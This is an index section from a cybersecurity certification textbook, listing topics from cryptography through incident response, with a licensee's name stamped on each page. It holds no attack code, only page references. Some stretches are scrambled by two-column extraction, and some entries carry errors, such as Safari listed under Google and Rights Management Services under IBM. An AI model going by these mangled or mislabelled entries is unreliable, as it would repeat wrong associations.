message authentication
code (MAC), 109
perfect forward secrecy,
107-108
plaintext, 96
public key cryptography
algorithms, 101-102
symmetric cipher, 96, 99-100

cryptographic longevity, 116
cryptographic performance
limitations, 113-114
cryptographic primitive, 111-112
cryptographic technologies
blockchain, 121
homomorphic encryption, 121
lightweight cryptography, 121
quantum and post-quantum,
120-121
steganography, 121-122
cryptographic use cases
authentication and non-
repudiation, 111-112
confidentiality, 112
integrity and resiliency of
data, 113
cryptographic weaknesses
performance limitations,
113-114
security limitations
entropy and weak keys,
114-115
predictability and
reuse, 115
cryptojacking, 89
Cryptolocker, 89
crypto-malware, 89
crypto-mining, 86-87, 89
CSA. see Cloud Security Alliance
(CSA)
CSF. see cybersecurity
framework (CSF)
CSO. see Chief Security Officer
(CSO)
CSP. see cloud service provider
(CSP)
CSR, 128-129, 142
CTF, 210-211
CTI, 26
curl, network reconnaissance
tools, 42
customer data, 441
CVE, 30, 59-60
CVSS, 59-60
cyber-attack life cycles, 20
cyber incident response team
(CIRT)
communication plan, 458
data sources, security
and information event
management (SIEM), 466-469
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
human resources (HR), 458
identification of incidents,
465-466
incident response plan (IRP),
458-459
legal department, 457-458
marketing team, 458
stakeholder management, 458
cyber kill chain attack
framework, 459-460
cybersecurity assurance,
security controls, 8-10
cybersecurity framework (CSF),
3, 10-11
cybersecurity resilience
backup strategies
backup media types,
526-527
backups and retention
policy, 522-523
backup storage issues, 526
copy backups, 525
differential backups,
524-525
full backups, 524
incremental backups,
524-525
non-persistence
environment, 528
order of restoration,
527-528
snapshots and images,
525-526
guidelines for
implementing, 537
redundancy strategies
asynchronous and
synchronous replication,
520
disk redundancy, 519
fault tolerance and
redundancy, 517
geographical dispersal, 520
geographical redundancy,
520
geographical replication,
520
high availability, 516-517
maximum tolerable
downtime (MTD), 516
network redundancy, 518
Index | I-9
power redundancy,
517-518
scalability and elasticity,
516-517
strategies
active defenses, 534-535
asset management, 531
change control, 530, 532
change management,
530, 532
configuration
management system
(CMS), 530-531
crypto diversity, 534
deception and disruption
strategies, 534-535
defense in depth, 533-534
honeyfiles, honey nets,
honey ports, 534-535
Information Technology
Infrastructure (ITIL),
530-531
layered security, 533-534
site resiliency, 532-533
technology and control
diversity, 533-534
vendor diversity, 534
cyber threat intelligence (CTI),
26, 479
cyber weapons, 20-21
CYOD. see Choose Your Own
Device (CYOD)
D
DAC (discretionary access
control), 199
DarkMatter, 88
dark net, 25-26
dark web, 25-26
dashboard, SIEM, 466-467
data acquisition, 490-491
data at rest, 112, 447
database, geographical
redundancy, 520
database deidentification
methods
aggregation/banding
technique, 452
data masking, 452
hashing, 452
salting, 452
tokenization, 452
Index
 I-10 | Index
database management systems
(DBMS), 451-452
data breaches, 53, 443-444
data classification, 440-441
data controller, 439-440
data custodian, 439
data-driven standard operating
procedure (SOP), 459
data exfiltration
data privacy and protection
controls, 448-449
impact of, 53
data exposure, 385
data governance team. see
privacy and data sensitivity
concepts
data historian, 334
data in processing, 447-448
data integrity, incident response
plan (IRP), 459
data in transit (motion), 447
data-in-transit (transport
encryption), 112
data in use, 447
data loss, impact of, 53
data loss prevention (DLP)
alert only, 449
block, 450
content filter configuration
changes, 477
endpoint protection, 328
quarantine, 450
secure web gateway
(SWG), 272
tombstone, 450
data masking, database
deidentification methods, 452
data minimization, 451
data owner (senior executive)
role, 439
data plane, 432
data privacy and protection
controls
database deidentification
methods, 451-452
database encryption, 447
data exfiltration, 448-449
data loss prevention (DLP),
449-450
guidelines for, 454
privacy enhancing
technologies, 451
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
rights management
services, 450
states of data, 447-448
data privacy and sensitivity
concepts
data breaches, 443-444
data classification, 440-441
data retention, 442-443
data roles and
responsibilities, 439-440
data sharing, 444-445
data sovereignty, 443
data types, 441-442
geographical considerations,
443
information life cycle
management, 438-439
privacy breaches, 443-444
privacy notices, 442
privacy terms of agreement,
444-445
privacy vs security, 438
data privacy officer (DPO), 439
data processor, 439-440
data protection controls. see
data privacy and protection
controls
data recovery, 495
data remnants, 552
data replication, 422-423
data retention, 442-443
data roles and responsibilities
data controller, 439-440
data custodian, 439
data owner (senior executive)
role, 439
data privacy officer (DPO), 439
data processor, 439-440
data steward, 439
data sanitization tools
crypto erase, 554
Instant Secure Erase
(ISE), 554
overwriting, 553
Secure Erase (SE), 554
data sensitivity concepts. see
privacy and data sensitivity
concepts
data sharing and use
agreement, 444-445
data sources
log files
application log files,
470-471
authentication logs, 470
network log files, 469
system and security
logs, 469
vulnerability scan
outputs, 470
metadata, 471-472
network data sources, 472-473
security and information
event management (SIEM)
correlation rules and
retention policy, 466
dashboard, 466-467
logging platforms, 468-469
sensitivity and alerts, 467
sensors, 467
trend analysis, 468
data sovereignty, 443
data steward, 439
data storage, third-party risks, 55
data storage performance
tiers, 422
data types, 441-442
dcfldd, 493
DDoS. see distributed denial of
service (DDoS)
dead code, 386
deauthentication attack, 244
Debian Linux, 114-115
Debian OpenSSL, 114-115
decentralized key management,
137
deception strategies, 534-535
default account, 184-185
default security groups, 185
default settings, weak host
configurations, 51
defense in depth, 533-534
deguassing, 553
deidentification process, 451
demilitarized zone (DMZ)
environmental security, 549
network topology and zones,
221-223
physical site security
controls, 541
screened hosts, 223
screened subnet, 222
triple-homed firewall, 222-223
denial of service (DoS) attacks

application programming
interfaces (APIs), 374
DNS security, 287
network address allocation,
284
open-source spoofing tool, 45
Wi-Fi protected setup
(WPS), 239
Department of Defense Cyber
Exchange, 12
deployment and automation
concepts
application development,
deployment, and
automation, 399
automation/scripting release
paradigms, 401-403
provisioning control, 401
secure application
development environments,
399
software diversity, 403
version control, 401
deployment models. see mobile
device deployment models
DER (Distinguished Encoding
Rules), 140
destination NAT/port
forwarding, 264-265
detection time, incident
response plan (IRP), 459
detective control, 9, 10
deterrent controls, 10
Developer Enterprise
Program, 345
development, security, and
operations (DevSecOps), 5-6
development and operations
(DevOps), 5-6
development environments
development, 400
integrity measurement, 401
production, 400
sandboxing, 401
secure configuration
baseline, 401
staging, 400
test/integration, 400
device accounts, credential
policies for, 186-187
device discovery, 358
Device Enrollment Program, 345
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Device Provisioning Protocol
(DPP), 239
DevOps. see development and
operations (DevOps)
DevSecOps. see development,
security, and operations
(DevSecOps)
DGA (domain generation
algorithm), 91
D-H (Diffie-Hellman) key
agreements, 107-108
DHCP. see Dynamic Host
Configuration Protocol (DHCP)
DHE. see Diffie-Hellman
Ephemeral mode (DHE or EDH)
DHE or EDH (Diffie-Hellman
Ephemeral mode), 107, 293
Diamond Model of Intrusion
Analysis, 461
dictionary attacks, 160
differential backups, 524-525
Diffie-Hellman (D-H) key
agreements, 107-108
Diffie-Hellman Ephemeral mode
(DHE or EDH), 107, 293
Diffserv, 252
Digicert, 127
digital certificates
attributes of, 130
certificate authority (CA)
issuing, 126-127
Client Authentication, 132
Code Signing, 132
code signing certificates, 135
defined, 126
Email Protection, 132
email/user certificates, 134
Extended Key Usage (EKU), 132
issues with, 143
Key Usage attribute, 132
machine/computer
certificates, 134
modes of operations, 106
policies, 132
root certificates, 135
secure remote access
protocols, 307
self-signed certificates, 135
Server Authentication, 132
standards for, 129
types of, 132
Index | I-11
web server certificate types,
132-133
see also certificate and key
management
digital envelopes, 105-106
digital forensics
documentation
counterintelligence,
487-488
digital forensics
reports, 485
e-discovery, 485-486
event logs, 487
network traffic, 487
strategic intelligence,
487-488
timelines, 486-487, 494
video interviews, 486
witness interviews, 486
evidence acquisition
artifacts and data
recovery, 495
cache data acquisition, 495
of Cloud data, 496
data acquisition, 490-491
digital forensics
software, 491
disk image acquisition, 493
firmware, 496
network data acquisition,
495
preservation and integrity
of evidence, 494
snapshot, 495
system memory
acquisition, 491-493
guidelines for, 498
key aspects of, 484-485
digital forensics reports, 485
digital forensics software, 491
Digital Guardian, data loss
prevention (DLP), 450
Digital Signature Algorithm
(DSA), 105
digital signatures, 104-105
digital tape systems, 527
direct access, 22
direct access attack vector, 22
directory services, 202-203
directory traversal injection
attack, 379
Index
 I-12 | Index
disassociation and replay
attacks, 244-245
disaster recovery plans (DRPs),
462-3, 512
disasters
environmental, 511
internal vs external, 511
person-made, 511
discretionary access control
(DAC), 199
disk, backup media types, 527
disk encryption, 320-321
disk image acquisition, 493
disk redundancy
multipath, 519
Redundant Array of
Independent Disks (RAID), 519
disruption strategies, 535
Distinguished Encoding Rules
(DER), 140
distinguished name (DN), 202
distributed denial of service
(DDoS)
load balancers, 247
mitigation, 248-249
remote access Trojans (RATs),
86-87
distributed reflection DOS
(DRDoS), 247
DLL (dynamic link library), 84
DLL injection, 369
DLP (data loss prevention), 272
DMZ. see demilitarized zone
(DMZ)
DN (distinguished name), 202
DNS. see domain name system
(DNS)
DNS amplification attack, 248
DNS client cache poisoning, 286
dnsenum, network
reconnaissance tools, 41
DNS event logs, 470
DNS poisoning
DNS client cache poisoning,
286
DNS server cache poisoning,
287
man-in-the-middle attack
(MitM), 286
DNSSEC (DNS Security
Extensions), 287-288
DNS security, 287-288
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
DNS Security Extensions DSA (Digital Signature
(DNSSEC), 287-288 Algorithm), 105
DNS server cache poisoning, 287 due diligence, 13
DNS sinkhole, 535 due process, 484
Docker, 413-414, 420 dump files, 471
documentation dumpster diving, 76
counterintelligence, 487-488 duress alarms, 544
in digital forensics, 484 DV (domain validation), 132-133
digital forensics reports, 485 dynamic code analysis, 387-388
e-discovery, 485-486 Dynamic Host Configuration
event logs, 487 Protocol (DHCP), 230, 284-285
network traffic, 487 dynamic link library (DLL)
strategic intelligence, 487-488 DLL injection, 369
timelines, 486-487, 494 fileless malware, 84
video interviews, 486 man-in-the-browser (MitB)
witness interviews, 486 attack, 397
Document Object Model dynamic resource allocation, 420
(DOM), 377
domain generation algorithm E
(DGA), 91
EAP (extensible authentication
domain hijacking, 285-286
protocol), 165-166, 240, 241-242
domain name resolution
EAPoL (EAP over LAN), 167
domain hijacking, 285-286
EAP-TLS, 241-242
domain reputation, 286
EAP-Tunneled TLS (EAP-TTLS),
uniform resource locator
242-243
(URL) redirection, 286
EAP with Flexible Authentication
domain name system (DNS)
via Secure Tunneling (EAP-
configuration baselines, 326
FAST), 243
domain name resolution,
east-west traffic considerations,
285-286
224
footprinting, 287
Easy Connect method, 239
network appliances, 217-218
eavesdropping, 227
poisoning, 286-287
ECC (elliptic curve cryptography),
security, 287-288
102, 105
domain reputation, 286
economic effects, incident
domain validation (DV), 132-133
response plan (IRP), 459
doppelganger domains, 79
edge computing, 432-433
DoS. see denial of service (DoS)
edge devices, 433
attacks
edge gateways, 433
downgrade attacks,
EDH. see Diffie-Hellman
cryptographic attacks, 116-117
Ephemeral mode (DHE or EDH)
downtime, incident response
e-discovery, 485-486
plan (IRP), 459
eduroam network, 243
DPP (Device Provisioning
egress traffic filtering, 256
Protocol), 239
EIGRP (Enhanced Interior
Dragonfly handshake, 238-239
Gateway Routing Protocol), 219
DRDoS (distributed reflection
EKU (Extended Key Usage), 132
DOS), 247
Electromagnetic Interference
driver manipulation, 369
(EMI), 551
drones/unmanned aerial vehicle
Electronically Stored Information
(UAV), 69-70, 338, 545
(ESI), 485-486
dry-pipe, 552

electronic locks, 542
elliptic curve cryptography (ECC)
Digital Signature Algorithm
(DSA), 105
public key cryptography
algorithms, 102
Elliptic Curve Diffie-Hellamn
Ephemeral mode, 293
email, as attack vectors, 23
email mailbox servers, 217
email metadata, 471-472
Email Protection, 132
email services
secure IMAP (IMAPS), 297
Secure/Multipurpose
Internet Mail Extensions
(S/MIMI), 297-298
Secure POP (POP3S), 297
Secure SMTP (SMTPS), 296
Simple Mail Transfer Protocol
(SMTP), 296-297
email/user certificates, 134
embedded system security
implications
communication
considerations, 333-334
constraints of, 331-332
filmware code control, 339
industrial control systems,
334-335
Internet of Things (IoT),
335-336
logic controllers, 332
medical devices, 338
multifunction printers
(MFPs), 337
network segmentation, 338
specialized systems for
facility automation, 336-337
vehicles and drones, 338
Voice over IP (VoIP), 337
wrappers, 339
Encapsulation Security Payload
(ESP), 305
EnCase Forensic, 493
encoding
Distinguished Encoding Rules
(DER), 140
Privacy-enhanced Electronic
Mail (PEM), 140
encryption
cloud storage security, 421-422
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
full disk encryption, 421
encryption ciphers and keys, 98
end of life (EOL), 322-323
end of service life (EOSL), 322-323
endpoints
configuration changes
application allow and
block lists, 478-479
quarantine, 479
endpoint agents, 449
endpoint protection
anti-malware software, 327
anti-virus software
(A-V), 327
data loss prevention
(DLP), 328
endpoint protection
deployment, 328
endpoint protection
platform (EPP), 327-328
host-based intrusion
detection/prevention
(HIDS)(HIPS), 327
endpoint protection
deployment, 328
endpoint protection platform
(EPP), 90, 327-328
endpoint security
antivirus response, 329
baseline configuration
and registry setting, 326
cybersecurity resilience,
533
endpoint protection,
327-328
hardening systems,
325-326
next-generation endpoint
protection, 328-329
patch management,
326-327
gateway, 424
interface, 424
restricting, 22
virtual private cloud
(VPC), 424
Enhanced Interior Gateway
Routing Protocol (EIGRP), 219
enterprise/IEEE 802.1X
authentication, 240-241
enterprise mobility
management (EMM)
Index | I-13
Android, 346-348
Apple’s iOS, 345-346
mobile application
management (MAM), 345
mobile device management
(MDM), 345
unified endpoint
management (UEM), 345
enterprise reference
architecture, defined, 11
enterprise risk management
(ERM), 501
see also risk management
enterprise single-sign on
(SSO), 295
entropy and weak keys, 114-115
entry/exit point security, 541
environmental disasters, 511
environmental security. see
host/environment security
ephemeral session keys,
107-108, 293
EPP (endpoint protection
platform), 90
eradication and recovery phase,
456-457
error handling, 367, 383
escrow of keys, 138
ESP (Encapsulation Security
Payload), 305
ethical hacking, 67
European Economic Area, 443
EV (extended validation), 133
event logs, 487
evidence, preservation and
integrity of, 494
evidence acquisition
artifacts and data recovery,
495
cache data acquisition, 495
of Cloud data, 496
data acquisition, 490-491
digital forensics software, 491
disk image acquisition, 493
firmware, 496
network data acquisition, 495
preservation and integrity of
evidence, 494
snapshot, 495
system memory acquisition,
491-493
evidence in digital forensics, 484
Index
 I-14 | Index

evil twins, 243-244 failover, 250 financial information, 442

exceptions handling, 385 Failure to Enroll Rate (FER), 173
Exchange mail users, 134 fake telemetry data, 535
execution control False Acceptance Rate (FAR), 172
allow list, 393 false flag campaigns, 21
block list, 393 false negative alerts, 61-62, 271
code signing, 393 false positive alerts, 61-62, 271
Linux, 394 False Rejection Rate (FRR), 172
OS-based execution control, FAR (False Acceptance Rate), 172
393-394 Faraday Cages, 550
Python, 392 fast-flux, 91
Windows, 394 Fast Identity Online (FIDO), 168
exercise types, blue, purple, red, fault tolerance and
white team, 68-69 redundancy, 517
Explicit TLS (FTPES), 296 FDE. see full disk encryption
exploitation frameworks Federal Information Processing
browser exploitation Standards (FIPS), 11
frameworks, 46 federation, 203
fireELF, 46 fencing, site security, 541
Metasploit, 45-46 FER (Failure to Enroll Rate), 173
Pacu, 46 Fibre Channel, 520
RouterSploit, 46 FIDO (Fast Identity Online), 168
Sn1per, 46 field programmable gate array
Zed Attack Proxy (ZAP), 46 (FPGA), 332
exposure factor (EF), 502 file/code repositories, virustotal.
Extended Key Usage (EKU), 132 com, 30
extended validation (EV), 133 file cookies, 292
extensible authentication file encryption (data-at-rest), 112
protocol (EAP), 165-166, 240, file extensions, 141
241-242 file integrity monitoring (FIM), 272
Extensible Configuration fileless malware, 84-85
Checklist Description Format file manipulation
(XCCDF), 63 cat command, 278
extensible markup language head and tail commands, 278
(XML) injection, 378 logger command, 278-279
external media protections, 350 file metadata, 471
external threat file system permissions, 200-201
actor/agent, 19 File Transfer Protocol (FTP), 295
malicious, 19 file transfer services
risk management, 501 Explicit TLS (FTPES), 296
extranet zones, 220 File Transfer Protocol
(FTP), 295
F FTP over SSL (FTPS), 296
Implicit TLS (FTPS), 296
facial recognition
SSH FTP (SFTP), 296
iris scan, 174
filmware, software
mobile device management
vulnerabilities, 50
(MDM), 348
filmware code control, 339
retinal scan, 174
filter expressions, 42-43
facility automation, 336-337
FIM (file integrity monitoring), 272
factors. see authentication
financial and reputation loss,
factors
impact of, 54
fingerprinting, service discovery,
39-40
fingerprint reader, 348
fingerprint recognition, 173
fingerprint scanners, 173
FIPS. see Federal Information
Processing Standards (FIPS)
fire detection and suppression,
551-552
fireELF, exploitation frameworks,
46
FireEye
network reconnaissance
tools, 41
system memory acquisition,
492
threat intelligence providers,
27
treat actors, 21
firewall implementation
application-based
firewalls, 260
firewall appliances, 259-260
firewall router appliance, 260
firewalls
access control lists (ACL),
262-263
application aware
firewalls, 258
application-based
firewalls, 260
application firewall, 260
cloud firewall security, 425
configuration changes,
476-477
firewall implementation,
259-260
firewall router appliance, 260
host-based firewall, 260
isolation-based containment,
475
native cloud application-
aware firewalls, 425
network address translation
(NAT), 263-265
network appliances, 217-218
network log files, 469
network operating system
(NOS) firewall, 260
next-generation firewall
integration, 329

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021

next-generation firewalls
(NGFW), 271-272
open-source vs. proprietary,
266
packet filtering firewalls, 256
packet injection and replay, 44
segmentation-based
containment, 475
stateful inspection firewalls,
257-259
threat intelligence sources, 25
unified threat management
(UTM), 271-272
virtual firewalls, 265
web application firewalls,
273, 425
firmware
digital forensics, 496
over the air updates, 361
first responder, 465
flash drive security, 321-322, 552
fog computing, 432-433
fog nodes, 433
footprinting, 69
footprinting (topology
discovery), 36-37
forced proxy, 261
Forcepoint, 426
forensic procedures, 463
forensics. see digital forensics
Forensic Toolkit (FTK), 491, 493
forms mechanism (POST), 292
forward proxy CASBs, 427
forward proxy servers, 261-262
4G cellular, 333
FQDN. see fully qualified domain
name (FQDN)
Freenet, 25
frequency-based trend
analysis, 468
F-Response TACTICAL, 492
FRR (False Rejection Rate), 172
FTP (File Transfer Protocol), 295
FTPES (Explicit TLS), 296
FTP over SSL (FTPS), 296
FTPS (FTP over SSL), 296
FTPS (Implicit TLS), 296
full backups, 524
full device encryption, 350
full disk encryption, 421
full disk encryption (FDE), 320-321
full-scale exercises, 512
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
full tunnel, VPN client
configuration, 309
fully qualified domain name
(FQDN), 128-129, 130, 285
functional exercises, 512
functional recovery plans, 512
Function as a Server (FaaS)/
serverless architecture, 430-431
funding, of threat actors, 19
fuzzers, 387-388
fuzzing, 387-388
G gray box, 68
gait analysis, 175
Galois Counter Mode, 293
Gartner, “Magic Quadrant”
reports, 328
gateway endpoints, 424
gateways, site security, 542-543
GCMP (AES Galois Counter
Mode Protocol), 238
GDPR. see General Data
Protection Regulation (GDPR)
General Data Protection
Regulation (GDPR), 13-14, 442,
443
generators, 518
generic accounts, 186-187
generic administrator account
management, 185
geofencing, 351
geographical considerations,
data security, 443
geographical dispersal, 520
geographical identification
metadata, 352
geographical redundancy, 520
geographical replication, 520
geolocation, 193
geo-redundant storage
(GRS), 423
Get-Help cmdlet, 392
global positioning system (GPS),
350-351, 357
GlobalSign, 127
GoDaddy, 127
Google
App Engine, 409
Chrome, 470
Cloud to Device Messaging,
361
Index | I-15
firewall service, 419
Google Pay, 360
Google Play, 346
G Suite, 409
Managed Google Play, 352
Play Protect, 347
Safari, 470
government data, 442
GPOs (group policy objects), 191
GPS tagging, 352
Gramm-Leach-Bliley Act (GLBA),
14, 504
gray hat hacker, 20
grayware
adware, 85
potentially unwanted
programs (PUPs), 82, 83
Greenbone Community Edition,
vulnerability manager, 59
Greenbone Networks, OpenVAS
scan engine, 58, 59, 61
grep command, 279
group account, 184
group policy objects (GPOs),
191, 394
guest accounts, 183-184
guest operating systems, 411
GUI topology discovery tools, 36
H
hackers, 20
hacker teams, 20
hacking the human, 74
hacktivists
defined, 20
influence campaigns, 82
Hak5 Pineapple, 69
halon gas-based fire
suppression, 552
hard disk drives (HDD)
data destruction, 552-553
Instant Secure Erase (ISE),
554
nonvolatile storage media,
493
Secure Erase (SE), 554
secure filmware,
implementing, 320
hardened PDS, 550
hardening systems, 325-326
Index
 I-16 | Index
hardware root of trust (RoT),
318-319
hardware security module
(HSM), 165, 422
Hashcat, 161
hashing
database deidentification
methods, 452
digital signatures, 104-105
hashing algorithms, 97-98
hashing algorithms
checksum, 97, 104-105
cryptographic ciphers, 97-98
digital signatures, 104-105
hashing, 97-98, 104-105
message digest algorithm
(MDA), 97-98
secure hash algorithm (SHA),
97-98
head commands, 278
health information, 441-442
Health Insurance Portability and
Accountability Act (HIPPA), 14,
444, 504
heating, ventilation, air
conditioning (HVAC), 550
heat map risk matrix, 503, 506
heat maps, 236
heuristics, 271
hibernation file, 492-493
HIDS (host-related intrusion
detection systems), 272
hierarchical (Intermediate CA),
127-128
high availability (HA), 422-423,
516-517
HMAC-based One-Time
Password Algorithm (HOTP),
168-169
hoaxes, 78-79
home automation devices, 336
Homeland Security Act, 504
homomorphic encryption, 121
honeyfiles, honey nets, honey
ports, 534-535
horizontal (consumer-specific,
cross-sector) legislation, 13-14
horizontal brute force online
attacks, 159
horizontal privilege escalation,
366
host-based firewall, 260
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
host-based intrusion detection/ guidelines for implementing,
prevention (HIDS)(HIPS), 327 341
hosted private cloud, 408 secure filmware,
host/environment security implementing
data sanitization tools, boot integrity, 319-320
553-554 disk encryption, 320-321
Faraday Cages, 550 end of life (EOL), 322-323
fire detection and end of service life (EOSL),
suppression, 551-552 322-323
hot/cold aisles, 551 hardware root of trust
HVAC, 550 (RoT), 318-319
protected distribution, 550 organizational security
secure areas, 548-549 agreements, 323
secure data destruction, third-party risk
552-553 management, 322
host hardware, 411 USB and flash drive
host-related intrusion detection security, 321-322
systems (HIDS), 272 HOSTS files, 286
host security solutions hot aisle/cold aisle
embedded system security arrangement, 551
implications HOTP (HMAC-based One-Time
communication Password Algorithm), 168-169
considerations, 333-334 hot plug PSU, 517
constraints of, 331-332 hot site, 532-533
facility automation, hotspots, 357-358
336-337 hot storage, 422
filmware code control, 339 HR policies. see human
industrial control resources (HR) policies
HSM (hardware security
systems, 334-335
module), 165
Internet of Things (IoT),
HTML5 VPN, 310
335-336
HTTP access logs, 470
logic controllers, 332
HTTP methods, 372-373
medical devices, 338
HttpOnly attributes, 384
multifunction printers
HTTPS (hypertext transfer
(MFPs), 337
protocol secure), 292
network segmentation,
HTTP Strict Transport Security
338
(HSTS), 385
vehicles and drones, 338
human-machine interfaces
Voice over IP (VoIP), 337 (HMIs), 334
wrappers, 339 human resources (HR) policies
endpoint security account policies
antivirus response, 329 access policies, 191-192
baseline configuration account attributes, 191
and registry setting, 326 account audits, 194
endpoint protection, account lockout and
327-328 disablement, 196-197
hardening systems, account password policy
325-326 settings, 192-193
next-generation endpoint account permissions, 195
protection, 328-329 account restrictions,
patch management, 193-194
326-327 usage audits, 195-196

administrator credential
policies, 185
background checks and
onboarding policies, 181
conduct policy, 208-209
credential management
policies, 183-184
device accounts credential
policies, 186-187
incident response (IR), 458
offboarding policies, 183
operation, 181
personnel policies for
privilege management,
182-183
recruitment, 181
terminations/separation, 181
training technique diversity,
210-211
user and role-based training,
209-210
hybrid password attacks, 160
hybrid warfare, 82
hypertext transfer protocol
secure (HTTPS), 292
hypervisor-based virtual
firewalls, 265
hypervisor/virtual machine
monitor (VMM), 411-412
I attribute-based access
I2P, 25
IAM. see identity and access
management (IAM)
IBM
Active Directory Rights
Management Services (RMS),
450
X-Force Exchange, 27
ICMP (Internet Control Message
Protocol), 36-37
ICV (Integrity Check Value), 305
ID badges, 546
idempotence, 431
identification of incidents,
456-457, 465, 466
identity and access
management (IAM)
accounting, 148-149
application security, 419
authentication, 148-149
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
authorization, 148-149
background checks and
onboarding policies, 181
identification, 148-149
operation, 181
recruitment, 181
secrets management, 419-420
terminations/separation, 181
identity and account
management controls
account policies
access policies, 191-192
account attributes, 191
account audits, 194
account lockout and
disablement, 196-197
account password policy
settings, 192-193
account permissions, 195
account restrictions,
193-194
usage audits, 195-196
administrator/root accounts
administrator credential
policies, 185
default security
groups, 185
generic administrator
account management, 185
authorization solutions
control (ABAC), 201
directory services, 202-203
discretionary access
control (DAC), 199
federation and
attestation, 203-204
file system permissions,
200-201
mandatory access control
(MAC), 201
Open Authorization
(OAuth) protocols, 205-206
Open ID Connect
(OIDC), 206
role-based access control
(RBAC), 199
rule-based access control,
201-202
security assertions
markup language (SAML),
204-205
Index | I-17
background checks and
onboarding policies, 181-182
guidelines for implementing,
213
identity management control
types
certificates and smart
cards, 180
identity provider (IdP),
180-181
tokens, 180
offboarding policies, 183
personnel policies
conduct policy, 208-209
training technique
diversity, 210-211
user and role-based
training, 209-210
personnel policies for privilege
management, 182-183
privilege access
management, 187
secure shell keys, 187
security account types and
credential management
guest accounts, 183-184
policies for personnel, 183
standard users, 183
security group-based
privileges, 184
service accounts, 185-186
shared/generic/device
accounts and credentials,
186-187
third-party credentials, 187
identity fraud, 77
identity management control
types
certificates and smart
cards, 180
identity provider (IdP), 180-181
tokens, 180
identity provider (IdP), 180-181,
203-204
identity theft, 53, 443-444
IdentTrust, 127
IdP (identity provider), 180-181,
203-204
IDS (intrusion detection system),
268-269
IEC, 11
Index
 I-18 | Index
IEEE 802.1x port-based NAC
(PNAC), 166
IKE (Internet Key Exchange),
307-308, 308
image backups, 525-526
IMAP4 (Internet Message Access
Protocol v4), 297
IMAPS (secure IMAP), 297
iMessage, 360
impact assessment, 442
impersonation, 75-76
Imperva, 273
Implicit TLS (FTPS), 296
impossible travel time/risky
login policy, 194
improper input handling, 367
in-band connection, 310
incident containment
isolation-based containment,
475-476
segmentation-based
containment, 476
incident eradication and
recovery, 476
incident response (IR)
business continuity plan
(BCP), 463
communication plan, 458
continuity of operation
planning (COOP), 463
cyber incident response
team (CIRT), 457-458
cyber kill chain attack
framework, 459-460
data sources
application log files,
470-471
authentication logs, 470
metadata, 471-472
network data sources,
472-473
network log files, 469
security and information
event management
(SIEM), 466-469
system and security
logs, 469
vulnerability scan
outputs, 470
Diamond Model of Intrusion
Analysis, 461
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
disaster recovery plans,
462-463
forensic procedures, 463
guidelines for, 482
identification of incidents,
465-466
incident response plan (IRP),
458-459
incident response process,
456-457
mitigation controls
adversarial artificial
intelligence, 480
content filter
configuration changes,
477-478
endpoint configuration
changes, 478-479
eradication and
recovery, 476
firewall configuration
changes, 476-477
incident containment,
475-476
security orchestration,
automation, and
response (SOAR), 479
MITRE ATT&CK, 460-461
playbook/runbook, 459, 479
retention policy, 463
simulations, 462
stakeholder management, 458
tabletop exercises, 461-462
walkthrough exercises, 462
incident response plan (IRP),
458-459
incident response process,
456-457
incineration data destruction, 552
incremental backups, 524-525
indicator of compromise (IoC),
28-29, 277
Indoor Positioning System (IPS),
350-351
industrial camouflage, 541
industrial control systems (ICSs),
334-335
Infiniband, 520
influence campaigns, 82
information assurance, security
controls, 8-10
information life cycle
management, 438-439
information security
benchmarks, 12-13
Cloud frameworks, 11-12
competencies, 3-4
cybersecurity framework, 3
information security
business units
DevSecOps, 5-6
SOC, 5
ISO, 11
regulations, standards, and
legislation, 13-14
roles and responsibilities
Chief Information Security
Officer (CISO), 4
Information Systems
Security Officer (ISSO), 4
secure configuration guides
application servers, 13
network appliance
platform, 12-13
operating systems (OS),
12-13
vendor-specific guides,
12-13
web server applications, 13
security controls
compensating controls, 10
deterrent controls, 10
functional types, 9, 10
managerial security
control, 8-10, 9
operational security
control, 8-10, 9
physical controls, 9, 10
technical security
controls, 8-10, 9
security roles, CIA Triad, 2
information security business
units
DevSecOps, 5-6
SOC, 5
Information Sharing and
Analysis Centers (ISACs), threat
intelligence providers, 27
Information Systems Security
Officer (ISSO), roles and
responsibilities, 4
Information Technology
Infrastructure (ITIL), 530-531

informed consent, 14
infrared connection methods, 359
infrastructure as a service (IaaS),
409, 410
infrastructure as code (IaC), 431
Infrastructure as Code concepts
application programming
interfaces (APIs), 430
edge computing, 432-433
fog computing, 432-433
infrastructure as code
(IaC), 431
serverless architecture,
430-431
service integration, 429-430
software-defined networking
(SDN), 431-432
software-defined visibility
(SDV), 432
ingress traffic filtering, 256
inherent risk, 504
initialization vector (IV), 100, 115
Initiative for Open
Authentication (OATH), 168
input validation, 383
insider threats, 21-22
inSSIDer, 244
instance awareness, 421
Instant Secure Erase (ISE), 554
intangible assets, 510
internal threats, 19
integer overflow, 368
Integrity Check Value (ICV), 305
integrity measurement, 401
integrity of evidence, 494
intellectual property (IP),
440-441, 501-502
Intelligence-Driven Computer
Network Defense (Lockheed
Martin), 459
intelligence fusion, 64-65
Intel Software Guard Extensions,
448
intent, of threat actors, 19
intentional threat, 18
interactive logon, 154
intercepting proxy, 261
interconnection security
agreement (ISA), 445
interface endpoints, 424
Intermediate CA (hierarchical),
127-128
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-19
internal controls, service intrusion prevention system
organization control (SOC2), 12 (IPS), 270
internal threat intrusive (active) vulnerability
actor/agent, 19 scanner, 60
insider threats, 21-22 invoice scams, 77
malicious, 19 Invoke-Command, 395
risk management, 501 Invoke-Expression, 395
internal vs external disasters, 511 Invoke-WMIMethod, 395
International Electrotechnical IoCs. see indicator of
Commission (IEC), 11 compromise (IoC)
International Organization for IP. see internet protocol (IP)
